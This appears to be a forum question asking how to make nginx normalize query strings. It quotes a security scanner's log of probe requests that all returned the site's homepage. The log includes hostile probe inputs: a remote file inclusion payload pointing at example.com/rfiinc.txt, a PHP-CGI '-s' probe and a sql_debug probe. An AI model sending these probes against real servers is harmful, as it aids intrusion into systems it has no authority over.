The last security audit revealed the following:

V:Wed Apr 15 20:58:19 2015 - 200 for GET: /?mod=node&nid=some_thing&op=view
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?Open
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?OpenServer
V:Wed Apr 15 20:59:16 2015 - 200 for GET: /?sql_debug=1
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?PageServices
V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?wp-cs-dump
V:Wed Apr 15 21:03:06 2015 - 200 for GET: /?D=A
V:Wed Apr 15 21:04:58 2015 - 200 for GET: /?_CONFIG[files][functions_page]=http://example.com/rfiinc.txt?
V:Wed Apr 15 21:08:00 2015 - 200 for GET: /?-s
V:Wed Apr 15 21:08:09 2015 - 200 for GET: /?q[]=x
V:Wed Apr 15 21:08:41 2015 - 200 for GET: /?sc_mode=edit
V:Wed Apr 15 21:09:30 2015 - 200 for GET: /?admin

In plain words, there is an infinite amount of $request_uri that returns the content of the canonical address.

You can test your own domain "example.com":

canonical:
http://example.com/

unwanted variants:
http://example.com/?mod=node&nid=some_thing&op=view
http://example.com/?Open
http://example.com/?OpenServer
...

Is there an nginx parameter to normalize this type of $uri?